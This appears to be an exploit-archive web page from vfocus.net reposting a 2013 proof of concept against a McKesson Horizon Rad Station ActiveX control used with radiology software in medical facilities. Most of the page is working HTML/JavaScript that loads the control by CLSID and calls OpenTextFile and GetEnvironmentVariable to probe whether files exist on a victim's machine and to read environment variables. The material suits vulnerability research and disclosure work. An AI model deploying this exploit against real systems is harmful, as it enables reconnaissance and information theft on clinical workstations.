首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
McKesson ActiveX File/Environmental Variable Enumeration
来源:vfocus.net 作者:Blake 发布时间:2013-09-22  
<html>
<!--
McKesson ActiveX File/Environmental Variable Enumeration
Vendor: McKesson
Version: 11.0.10.38
Tested on: Windows XP SP3 / IE
Download: N/A
Author: Blake
Additional Details: This activex control is packaged with the Horizon Rad Station software used by medical facilities to view radiology images.
  
CLSID: 0EBFF91A-001E-4FF1-ABBB-FF9D0F6E3E3B
Path: C:\Program Files\McKesson\HRS Distributed\McKDXVLauncher.dll
Member Name: OpenTextFile
Member Name: GetEnvironmentVariable
Progid: DXVLauncherLib.McKLauncher
Safe for Scripting: True
Safe for Initialization: True
Kill Bit: False
-->
<object classid='clsid:0EBFF91A-001E-4FF1-ABBB-FF9D0F6E3E3B' id='target' ></object>
<title>McKesson Rad Station ActiveX File/Variable Enumeration</title>
<h1>McKesson Rad Station File Enumeration</h1>
<p>This proof of concept will check if a file exists on the victim's machine or display the contents of an environmental variable. It uses the member OpenTextFile from DXVLauncherLib.McKLauncher and returns an object if the file exists and uses the member GetEnvironmentVariable to display the contents of the environmental variable.
</p>
<form>File to check for: <input type="text" name="filename" value="c:\WINDOWS\win.ini">
<input type=button onclick="checkfile()" value="File Exists?"><br />
Environmental Variable: <input type="text" name="variable" value="username">
<input type=button onclick="getvariablevalue()" value="Get Value">
</form>
  
<script>
function checkfile()
{
    var file = document.getElementById('filename').value;
    var arg2 = 1;
  
    try {
        target.OpenTextFile(file,arg2); 
        alert("File " + file + " exists");
    }
    catch (oException) {
        alert("File does not exist or was not found at the location specified")
    }
}
  
function getvariablevalue()
{
var variablevalue = document.getElementById('variable').value;
  
result = target.GetEnvironmentVariable(variablevalue); 
alert("Value of " + variablevalue + ": " + result );
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TeraCopy 2.3 (default.mo) Lang
·Western Digital Arkeia Remote
·Vino VNC Server 3.7.3 - Persis
·OpenEMR 4.1.1 Patch 14 SQLi Pr
·HP ProCurve Manager SNAC Updat
·A-PDF WAV to MP3 1.0.0 Buffer
·HP ProCurve Manager SNAC Updat
·freeFTPd 1.0.10 PASS Command S
·Agnitum Outpost Internet Secur
·GLPI install.php Remote Comman
·Sophos Web Protection Applianc
·Linksys WRT110 Remote Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved